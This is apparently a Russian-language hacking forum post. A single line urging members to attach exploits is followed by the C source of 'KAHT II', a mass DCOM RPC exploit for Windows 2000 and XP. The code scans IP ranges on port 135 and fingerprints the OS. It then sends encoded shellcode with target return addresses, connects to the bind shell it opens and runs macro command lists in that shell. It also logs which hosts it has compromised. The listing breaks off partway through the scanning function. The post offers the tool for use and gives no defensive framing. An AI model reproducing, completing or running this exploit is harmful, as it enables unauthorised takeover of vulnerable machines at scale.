| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |

Мужики, я думаю будет лучше присоединять сплоиты в атач!

| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |

#include <stdio.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#ifdef WIN32
#include <unistd.h>
#include <windows.h>
#include <process.h>
#include <winsock2.h>
#include <tcconio.h>
#pragma comment (lib,"ws2_32.lib")
#else
#include <pthread.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/sem.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <fcntl.h>
#include <unistd.h>
#endif

#define MAX_THREADS 512
#define NTHREADS 50
#define PORT 135
#define CONNECT 6 //Connect Timeout
#define RECV 5 //recv Timeout
#define ATTACKTIMEOUT 5 //
#define RPC_FINGERPRINT_TIMEOUT 6 //rpc fingerprint
#define INITRPORT (rand()/2)+32767
//#define INITRPORT 53 //PORT TO SPAWN A SHELL


int RPORT,salir=0,threads=0,rpcopen=0;
//int AUTOHACKING=0;
int ip1[4],ip2[4];
FILE *results; //results.txt ips con el puerto 135 abierto
#ifndef WIN32
#define CRITICAL_SECTION pthread_t
#endif
CRITICAL_SECTION cs,css,cslog,csshell; //Givemeip CS, number of threads, ipstologfile,shell()



//Ultra Fast port Scanner
char *givemeip(char *ip);
void checkea(void *threadn);
//Macro Functions..
void show_macros(int sock2);
void execute_macro(char opt,int sock2);
void macro(char opt, int sock2);
//Exploit Code...
void attack(char *linea,int peta);
int shell (int sock2);
void readconsole(void *sock2);
//me
void banner(void);
// remote Install
int InstallRemoteServiceNbt (char *ip);
int InstallRemoteServiceFtp (char *ip);


unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,

0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,

0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,

0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,

0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char winshellcode[]=
"\x05\x00\x00\x03\x10\x00\x00\x00\xa8\x06\x00\x00\xe5\x00\x00\x00"
"\x90\x06\x00\x00\x01\x00\x04\x00\x05\x00\x06\x00\x01\x00\x00\x00"
"\x00\x00\x00\x00\x32\x24\x58\xfd\xcc\x45\x64\x49\xb0\x70\xdd\xae"
"\x74\x2c\x96\xd2\x60\x5e\x0d\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x70\x5e\x0d\x00\x02\x00\x00\x00\x7c\x5e\x0d\x00\x00\x00\x00\x00"
"\x10\x00\x00\x00\x80\x96\xf1\xf1\x2a\x4d\xce\x11\xa6\x6a\x00\x20"
"\xaf\x6e\x72\xf4\x0c\x00\x00\x00\x4d\x41\x52\x42\x01\x00\x00\x00"
"\x00\x00\x00\x00\x0d\xf0\xad\xba\x00\x00\x00\x00\xa8\xf4\x0b\x00"
"\x20\x06\x00\x00\x20\x06\x00\x00\x4d\x45\x4f\x57\x04\x00\x00\x00"
"\xa2\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
"\x38\x03\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
"\x00\x00\x00\x00\xf0\x05\x00\x00\xe8\x05\x00\x00\x00\x00\x00\x00"
"\x01\x10\x08\x00\xcc\xcc\xcc\xcc\xc8\x00\x00\x00\x4d\x45\x4f\x57"
"\xe8\x05\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00"
"\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\xc4\x28\xcd\x00\x64\x29\xcd\x00\x00\x00\x00\x00"
"\x07\x00\x00\x00\xb9\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
"\x00\x00\x00\x46\xab\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
"\x00\x00\x00\x46\xa5\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
"\x00\x00\x00\x46\xa6\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
"\x00\x00\x00\x46\xa4\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
"\x00\x00\x00\x46\xad\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
"\x00\x00\x00\x46\xaa\x01\x00\x00\x00\x00\x00\x00\xc0\x00\x00\x00"
"\x00\x00\x00\x46\x07\x00\x00\x00\x60\x00\x00\x00\x58\x00\x00\x00"
"\x90\x00\x00\x00\x40\x00\x00\x00\x20\x00\x00\x00\x38\x03\x00\x00"
"\x30\x00\x00\x00\x01\x00\x00\x00\x01\x10\x08\x00\xcc\xcc\xcc\xcc"
"\x50\x00\x00\x00\x4f\xb6\x88\x20\xff\xff\xff\xff\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x10\x08\x00\xcc\xcc\xcc\xcc"
"\x48\x00\x00\x00\x07\x00\x66\x00\x06\x09\x02\x00\x00\x00\x00\x00"
"\xc0\x00\x00\x00\x00\x00\x00\x46\x10\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x78\x19\x0c\x00"
"\x58\x00\x00\x00\x05\x00\x06\x00\x01\x00\x00\x00\x70\xd8\x98\x93"
"\x98\x4f\xd2\x11\xa9\x3d\xbe\x57\xb2\x00\x00\x00\x32\x00\x31\x00"
"\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x80\x00\x00\x00\x0d\xf0\xad\xba"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x18\x43\x14\x00\x00\x00\x00\x00\x60\x00\x00\x00\x60\x00\x00\x00"
"\x4d\x45\x4f\x57\x04\x00\x00\x00\xc0\x01\x00\x00\x00\x00\x00\x00"
"\xc0\x00\x00\x00\x00\x00\x00\x46\x3b\x03\x00\x00\x00\x00\x00\x00"
"\xc0\x00\x00\x00\x00\x00\x00\x46\x00\x00\x00\x00\x30\x00\x00\x00"
"\x01\x00\x01\x00\x81\xc5\x17\x03\x80\x0e\xe9\x4a\x99\x99\xf1\x8a"
"\x50\x6f\x7a\x85\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
"\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x30\x00\x00\x00\x78\x00\x6e\x00"
"\x00\x00\x00\x00\xd8\xda\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x20\x2f\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00"
"\x00\x00\x00\x00\x03\x00\x00\x00\x46\x00\x58\x00\x00\x00\x00\x00"
"\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x10\x00\x00\x00\x30\x00\x2e\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x01\x10\x08\x00\xcc\xcc\xcc\xcc\x68\x00\x00\x00\x0e\x00\xff\xff"
"\x68\x8b\x0b\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x86\x01\x00\x00\x00\x00\x00\x00\x86\x01\x00\x00\x5c\x00\x5c\x00"
"\x46\x00\x58\x00\x4e\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
"\x4e\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00\x46\x00\x58\x00"
"\x46\x00\x58\x00\x9f\x75\x18\x00\xcc\xe0\xfd\x7f\xcc\xe0\xfd\x7f"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\xeb\x19\x5e\x31\xc9\x81\xe9\x89\xff"
"\xff\xff\x81\x36\x80\xbf\x32\x94\x81\xee\xfc\xff\xff\xff\xe2\xf2"
"\xeb\x05\xe8\xe2\xff\xff\xff\x03\x53\x06\x1f\x74\x57\x75\x95\x80"
"\xbf\xbb\x92\x7f\x89\x5a\x1a\xce\xb1\xde\x7c\xe1\xbe\x32\x94\x09"
"\xf9\x3a\x6b\xb6\xd7\x9f\x4d\x85\x71\xda\xc6\x81\xbf\x32\x1d\xc6"
"\xb3\x5a\xf8\xec\xbf\x32\xfc\xb3\x8d\x1c\xf0\xe8\xc8\x41\xa6\xdf"
"\xeb\xcd\xc2\x88\x36\x74\x90\x7f\x89\x5a\xe6\x7e\x0c\x24\x7c\xad"
"\xbe\x32\x94\x09\xf9\x22\x6b\xb6\xd7\xdd\x5a\x60\xdf\xda\x8a\x81"
"\xbf\x32\x1d\xc6\xab\xcd\xe2\x84\xd7\xf9\x79\x7c\x84\xda\x9a\x81"
"\xbf\x32\x1d\xc6\xa7\xcd\xe2\x84\xd7\xeb\x9d\x75\x12\xda\x6a\x80"
"\xbf\x32\x1d\xc6\xa3\xcd\xe2\x84\xd7\x96\x8e\xf0\x78\xda\x7a\x80"
"\xbf\x32\x1d\xc6\x9f\xcd\xe2\x84\xd7\x96\x39\xae\x56\xda\x4a\x80"
"\xbf\x32\x1d\xc6\x9b\xcd\xe2\x84\xd7\xd7\xdd\x06\xf6\xda\x5a\x80"
"\xbf\x32\x1d\xc6\x97\xcd\xe2\x84\xd7\xd5\xed\x46\xc6\xda\x2a\x80"
"\xbf\x32\x1d\xc6\x93\x01\x6b\x01\x53\xa2\x95\x80\xbf\x66\xfc\x81"
"\xbe\x32\x94\x7f\xe9\x2a\xc4\xd0\xef\x62\xd4\xd0\xff\x62\x6b\xd6"
"\xa3\xb9\x4c\xd7\xe8\x5a\x96\x80\x40\xa1\x1f\x4c\xd5\x24\xc5\xd3"
"\x40\x64\xb4\xd7\xec\xcd\xc2\xa4\xe8\x63\xc7\x7f\xe9\x1a\x1f\x50"
"\xd7\x57\xec\xe5\xbf\x5a\xf7\xed\xdb\x1c\x1d\xe6\x8f\xb1\x78\xd4"
"\x32\x0e\xb0\xb3\x7f\x01\x5d\x03\x7e\x27\x3f\x62\x42\xf4\xd0\xa4"
"\xaf\x76\x6a\xc4\x9b\x0f\x1d\xd4\x9b\x7a\x1d\xd4\x9b\x7e\x1d\xd4"
"\x9b\x62\x19\xc4\x9b\x22\xc0\xd0\xee\x63\xc5\xea\xbe\x63\xc5\x7f"
"\xc9\x02\xc5\x7f\xe9\x22\x1f\x4c\xd5\xcd\x6b\xb1\x40\x64\x98\x0b"
"\x77\x65\x6b\xd6\x93\xcd\xc2\x94\xea\x64\xf0\x21\x8f\x32\x94\x80"
"\x3a\xf2\xec\x8c\x34\x72\x98\x0b\xcf\x2e\x39\x0b\xd7\x3a\x7f\x89"
"\x34\x72\xa0\x0b\x17\x8a\x94\x80\xbf\xb9\x51\xde\xe2\xf0\x90\x80"
"\xec\x67\xc2\xd7\x34\x5e\xb0\x98\x34\x77\xa8\x0b\xeb\x37\xec\x83"
"\x6a\xb9\xde\x98\x34\x68\xb4\x83\x62\xd1\xa6\xc9\x34\x06\x1f\x83"
"\x4a\x01\x6b\x7c\x8c\xf2\x38\xba\x7b\x46\x93\x41\x70\x3f\x97\x78"
"\x54\xc0\xaf\xfc\x9b\x26\xe1\x61\x34\x68\xb0\x83\x62\x54\x1f\x8c"
"\xf4\xb9\xce\x9c\xbc\xef\x1f\x84\x34\x31\x51\x6b\xbd\x01\x54\x0b"
"\x6a\x6d\xca\xdd\xe4\xf0\x90\x80\x2f\xa2\x04\x00\x5c\x00\x43\x00"
"\x24\x00\x5c\x00\x31\x00\x32\x00\x33\x00\x34\x00\x35\x00\x36\x00"
"\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00"
"\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x31\x00\x2e\x00"
"\x64\x00\x6f\x00\x63\x00\x00\x00\x01\x10\x08\x00\xcc\xcc\xcc\xcc"
"\x20\x00\x00\x00\x30\x00\x2d\x00\x00\x00\x00\x00\x88\x2a\x0c\x00"
"\x02\x00\x00\x00\x01\x00\x00\x00\x28\x8c\x0c\x00\x01\x00\x00\x00"
"\x07\x00\x00\x00\x00\x00\x00\x00";

struct
{
char *os;
u_long ret;
} targets[] =
{
{ "[Win2k]", 0x0018759F },
{ "[WinXP]", 0x0100139d },
};



//GLOBALS...

/******************************************************************/

void banner(void)
{
printf ("_________________________________________________ \n");
printf(" KAHT II - MASSIVE RPC EXPLOIT\n");
printf(" DCOM RPC exploit. Modified by aT4r@3wdesign.es\n");
printf(" #haxorcitos && #localhost @Efnet Ownz you!!!\n");
printf ("________________________________________________\n\n");

}
void usage(void)
{
printf(" Usage: KaHt2.exe IP1 IP2 [THREADS] [AH]\n");
printf(" example: KaHt2.exe 192.168.0.0 192.168.255.255\n");
printf("\n NEW!: Macros Available in shell enviroment!!\n Type !! for more info into a shell.\n");
//printf(" If AUTOHACKING ENABLED MACRO !9 WILL BE EXECUTED\n");
exit(1);
}


/******************************************************************/
/*****************************************************************/
void execute_macro(char opt,int sock2){

FILE *macro;
char cadena[512];
char tmp[512];
int found=0;
int delay=500; //configurable TIMEOUT FOR CMDS - Default=500
if ((macro=fopen("macros.txt","r")) !=NULL)
{
while (!feof(macro))
{
memset(cadena,'\0',sizeof(cadena));
fgets(cadena,sizeof(cadena)-1,macro);
cadena[strlen(cadena)-1]='\0';
if ((found==1) && (( strncmp(cadena,"[Macro]",strlen("[Macro]"))) ==0) )
{
fclose(macro);
printf(" + Ejecucion de La Macro Terminada\n");
fclose(macro);return;}
if (( strncmp(cadena,"delay=",strlen("delay="))) ==0)
delay=atoi(cadena+6);

if (( strncmp(cadena,"key=",strlen("key="))) ==0)
if (( cadena+strlen("key=!"))[0]==opt)
found=1; //OUR CMDS ARE HERE!

if ( (( strncmp(cadena,"cmd=",strlen("cmd="))) ==0) && (found) )
if (strlen(cadena)>strlen("cmd= "))
{
strcpy(tmp,cadena+4);
strcat(tmp,"\r\n");
send(sock2,tmp,strlen(tmp),0);
//printf("Enviado: %s! de tamaсo: %i\n",tmp,sizeof(tmp));
sleep(delay);
}
}
fclose(macro);
send(sock2,"\n",strlen("\n"),0);
printf(" - Macro Done -\n");
}

sleep(25);




}

/*****************************************************************/
void show_macros(int sock2){
FILE *macro;
char cadena[512];

printf(" +______________(Available Macros)______________\n");
if ((macro=fopen("macros.txt","r")) !=NULL)
{
while (!feof(macro))
{
memset(cadena,'\0',512);
fgets(cadena,sizeof(cadena)-1,macro);
if (strlen(cadena)>1)
{
cadena[strlen(cadena)-1]='\0';
if (( strncmp(cadena,"name=",strlen("name="))) ==0)
printf(" + Nombre: %s ",cadena+strlen("name="));
if ((strncmp(cadena,"key=",strlen("key="))) ==0)
printf("Trigger: %s\n",cadena+strlen("key="));
}
}
fclose(macro);
}
send(sock2,"\n",strlen("\n"),0);
sleep(10);

}
/*****************************************************************/



void macro(char opt, int sock2)
{
switch(opt)
{
case '!':
show_macros(sock2);
break;
default:
execute_macro(opt,sock2);
break;
}
}



/*****************************************************************/
void readconsole(void *sock2)
{
int l;
char buf[512];

/*if (AUTOHACKING) {
execute_macro('9',(int) sock2);
salir=1;
}
*/
while(!salir)
{
l = read (0, buf, sizeof (buf));
if (l <= 0)
salir=1;
else
{
if ( (l==3) && (buf[0]=='!') )
macro(buf[1],(int)sock2);
else
{
send((int)sock2,buf,l,0);
if (strncmp(buf,"exit",strlen("exit")) ==0)
{
salir=1;
_endthread();
}
}
}
}

}

void enviamacro(void *sock2)
{
sleep(500);

macro(9,(int)sock2);
salir=1;
_endthread();


}

/****************************************************************/
int shell (int sock2) /* NOT RIPPED FROM TESO */
{
int l;
char buf[512];
salir=0;
_beginthread(readconsole,4096,(void *)(int) sock2);
while (!salir)
{
if ((l=recv (sock2, buf, sizeof (buf),0))>0)
write (1, buf, l);
else sleep(100);

}
printf("\n - Connection Closed\n");
return (salir);
}
/*****************************************************************/

int main(int argc, char **argv)
{
int i,total=NTHREADS;

#ifdef WIN32
WSADATA ws;

clrscr();
#endif
banner();

if(argc<3)
usage();
#ifdef WIN32
if (WSAStartup(MAKEWORD(2,0),&ws)!=0)
{
printf(" WSAStartup Error: %d\n",WSAGetLastError());
exit(1);
}
#endif
sscanf (argv[1], "%d.%d.%d.%d", &ip1[0],&ip1[1],&ip1[2],&ip1[3]);
sscanf (argv[2], "%d.%d.%d.%d", &ip2[0],&ip2[1],&ip2[2],&ip2[3]);

for(i=0;i<4;i++)
{
if ( (ip1[i]>255) || (ip1[i]<0) ) usage();
if ( (ip2[i]>255) || (ip2[i]<0) ) usage();

}
if (argc==4) total=atoi(argv[3]);
// if (argc==5) AUTOHACKING=atoi(argv[4]);

#ifdef WIN32
InitializeCriticalSection(&cs);
InitializeCriticalSection(&css);
InitializeCriticalSection(&cslog);
InitializeCriticalSection(&csshell);
#else
//Aqui meter los thread de linux y semaforos
#endif
//ULTRA FAST PORT SCANNER....
if ((results=fopen("results.txt","w"))==NULL) exit(0);
printf(" [+] Targets: %s-%s with %i Threads\n",argv[1],argv[2],total);
srand ( time(NULL) ); RPORT=INITRPORT;
printf(" [+] Attacking Port: %i. Remote Shell at port: %i\n",PORT,RPORT);
printf(" [+] Scan In Progress...\n");
for(i=0;i<total;i++)
#ifdef WIN32
_beginthread(checkea,8192,(void *)i);
#else
//Aqui meter los thread de linux y semaforos
#endif
while(threads>0)
sleep(100);
fclose(results);
printf("\n [+] Scan Finished. Found %i open ports\n",rpcopen);

return(0);
}


/ ********************************************************************************
********/

//void attack(char *linea,int peta)
void attack(char *linea,int peta)
{
if (peta==-1) return;


// if (AUTOHACKING!=1)
#ifdef WIN32
struct timeval tv;
#else
struct time_t tv;
#endif
struct sockaddr_in target_ip;
int sock,sock2; //Exploit Socket && Shell Socket
unsigned short port = 135;

unsigned short lportl=666; /* drg */
char lport[4] = "\x00\xFF\xFF\x8b"; /* drg */
unsigned char buf1[0x1000];
u_long tmp=1; //TIMEOUTS
FILE *w2k;
FILE *wxp;
int i;
fd_set fds;

EnterCriticalSection(&csshell);

target_ip.sin_family = AF_INET;
target_ip.sin_addr.s_addr = inet_addr(linea);
target_ip.sin_port = htons(port);

if ((sock=socket(AF_INET,SOCK_STREAM,0)) != -1)
{
printf(" - Connecting to %s\n",linea);

tmp=1;
ioctlsocket( sock, FIONBIO, &tmp);
tv.tv_sec = CONNECT;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sock, &fds);

connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip));
//if((i=select(sock+1,0,&fds,0,&tv))!=SOCKET_ERROR)
// if (i!=0)
if((i=select(sock+1,0,&fds,0,&tv))>0)
{
printf(" Sending Exploit to a %s Server...",targets[peta].os);
tmp=0;
ioctlsocket( sock, FIONBIO, &tmp);
if (send(sock,bindstr,sizeof(bindstr),0)>0)
{
tmp=1;
ioctlsocket( sock, FIONBIO, &tmp);
tv.tv_sec = RECV;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sock, &fds);
if(select(sock +1, &fds, NULL, NULL, &tv) > 0)
{
recv(sock, buf1, 1000, 0);

lportl=htons(RPORT);
memcpy(&lport[1], &lportl, 2);
*(long*)lport = *(long*)lport ^ 0x9432BF80;
memcpy(&winshellcode[1351],&lport,4);
memcpy(winshellcode+916, (unsigned char *) &targets[peta].ret, 4);
tmp=0;
ioctlsocket( sock, FIONBIO, &tmp);

send(sock,winshellcode,1705,0);
sleep(50);
if ((sock2=socket(AF_INET,SOCK_STREAM,0)) !=-1)
{
target_ip.sin_family = AF_INET;
target_ip.sin_addr.s_addr = inet_addr(linea);
target_ip.sin_port = htons(RPORT);
tmp=1;
ioctlsocket( sock2, FIONBIO, &tmp);
tv.tv_sec = CONNECT;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sock2, &fds);
connect(sock2,(struct sockaddr *)&target_ip, sizeof(target_ip));
if((i=select(sock+1,0,&fds,0,&tv))>0)
{
printf("\n - Conectando con la Shell Remota...\n\n");
salir=0;
shell(sock2);
#ifdef WIN32
closesocket(sock2);
#else
close(sock2);
#endif
strcat(linea,"\n");
if (peta==0)
{
w2k=fopen("win2k.txt","a");
if (w2k!=NULL)
{ fputs(linea,w2k); fclose(w2k);}
else printf(" !!UNABLE TO LOG IP %s",linea);

}
else
{

wxp=fopen("winxp.txt","a");
if (wxp!=NULL)
{fputs(linea,wxp); fclose(wxp);}
else printf(" !!UNABLE TO LOG IP %s",linea);
}
//} else printf("UNABLE TO CONNECT TO SHELL\n");
} else printf("FAILED\n");
}
else printf("\n UNABLE TO CREATE SOCK2\n");
}
else printf(" FAILED to send Exploit2\n");
}
else printf(" FAILED to send Exploit\n");
}

}
//if (AUTOHACKING!=1)
LeaveCriticalSection(&csshell);

}

/ ********************************************************************************
*/
char *givemeip(char *ip)
{

EnterCriticalSection(&cs);


if (ip1[3]!=254)
ip1[3]++;
else
{
return(NULL); //uhh kiddiss!

}
if (ip1[2]==255)
{ ip1[2]++; ip1[1]++;}

LeaveCriticalSection(&cs);

if (ip1[2]>ip2[2]) return(NULL);
if (ip1[2]==ip2[2])
if (ip1[3]>ip2[3]) return(NULL);

sprintf(ip,"%d.%d.%d.%d",ip1[0],ip1[1],ip1[2],ip1[3]);

return(ip);
}

/******************************************************************************/

//int version(char *ip, int sock)

int version(char ip[16], int sock)
{
//un poco de ettercap...


unsigned char peer0_0[] = {
0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00,
0xcc, 0x00, 0x00, 0x00, 0x84, 0x67, 0xbe, 0x18,
0x31, 0x14, 0x5c, 0x16, 0x00, 0x00, 0x00, 0x00,
0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00,
0xb8, 0x4a, 0x9f, 0x4d, 0x1c, 0x7d, 0xcf, 0x11,
0x86, 0x1e, 0x00, 0x20, 0xaf, 0x6e, 0x7c, 0x57,
0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00,
0x02, 0x00, 0x01, 0x00, 0xa0, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x00,
0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11,
0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60,
0x02, 0x00, 0x00, 0x00, 0x03, 0x00, 0x01, 0x00,
0x0a, 0x42, 0x24, 0x0a, 0x00, 0x17, 0x21, 0x41,
0x2e, 0x48, 0x01, 0x1d, 0x13, 0x0b, 0x04, 0x4d,
0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00,
0x04, 0x00, 0x01, 0x00, 0xb0, 0x01, 0x52, 0x97,
0xca, 0x59, 0xcf, 0x11, 0xa8, 0xd5, 0x00, 0xa0,
0xc9, 0x0d, 0x80, 0x51, 0x00, 0x00, 0x00, 0x00,
0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11,
0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60,
0x02, 0x00, 0x00, 0x00 };


unsigned char peer0_1[] = {
0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00,
0xaa, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41,
0x80, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x05, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x28, 0x63, 0x29, 0x20,
0x75, 0x65, 0x72, 0x84, 0x20, 0x73, 0x73, 0x53,
0x20, 0x82, 0x80, 0x67, 0x00, 0x00, 0x00, 0x00,
0x80, 0x1d, 0x94, 0x5e, 0x96, 0xbf, 0xcd, 0x11,
0xb5, 0x79, 0x08, 0x00, 0x2b, 0x30, 0xbf, 0xeb,
0x01, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
0x5c, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x00, 0x00,
0x41, 0x00, 0x41, 0x00, 0x5c, 0x00, 0x43, 0x00,
0x24, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x2e, 0x00,
0x74, 0x00, 0x78, 0x00, 0x74, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,
0xff, 0xff, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00,
0x58, 0x73, 0x0b, 0x00, 0x01, 0x00, 0x00, 0x00,
0x31, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46,
0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x07, 0x00 };

/*

unsigned char win2kvuln[] = {
0x04, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11,
0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60,
0x02, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11,
0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60,
0x02, 0x00, 0x00, 0x00};
*/
fd_set fds2;
unsigned char buf[1024];

int l;
struct timeval tv2;
FD_ZERO(&fds2);
FD_SET(sock, &fds2);
tv2.tv_sec = RPC_FINGERPRINT_TIMEOUT;
tv2.tv_usec = 0;

memset(buf,'\0',sizeof(buf));
send(sock,peer0_0,sizeof(peer0_0),0);
if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0)
{
l=recv (sock, buf, sizeof (buf),0);
// for(i=0;i<52;i++)
// {
// if (i==28) i=i+4;
// if (buf[i+32]!=win2kvuln[i])
// {
send(sock,peer0_1,sizeof(peer0_1),0);
if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0)
{
memset(buf,'\0',sizeof(buf));
l=recv (sock, buf, sizeof (buf),0);
if (l==32)
{
closesocket(sock);
return(1);//winxp
}
else
{
#ifdef WIN32
closesocket(sock);
#else
close(sock);
#endif
return(0);//win2kby default. Nt4 not added..
}
}
else return(-1);
// }


//}
// closesocket(sock);
// return(0);//win2k
}
closesocket(sock);
return(-1); //Unknown
}
/ ********************************************************************************
/

void checkea(void *threadn)
{
char ip[16];
char ip2[17];
int sock,i;
struct sockaddr_in target_ip;
fd_set fds;
u_long tmp=1;
struct timeval tv;


EnterCriticalSection(&css);
threads++;
sleep(1);
LeaveCriticalSection(&css);
memset(ip,'\0',sizeof(ip));
while (givemeip(ip)!=NULL)
{
//printf("Checkeando IP: %s\n",ip);
target_ip.sin_family = AF_INET;
target_ip.sin_addr.s_addr = inet_addr(ip);
target_ip.sin_port = htons(135);
closesocket(sock);
if ((sock=socket(AF_INET,SOCK_STREAM,0)) != -1)
{
tmp=1;
ioctlsocket( sock, FIONBIO, &tmp);
tv.tv_sec = CONNECT;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sock, &fds);

connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip));
if((i=select(sock+1,0,&fds,0,&tv))>0)
{
sprintf(ip2,"%s\n",ip);
EnterCriticalSection(&cslog);
fputs(ip2,results);
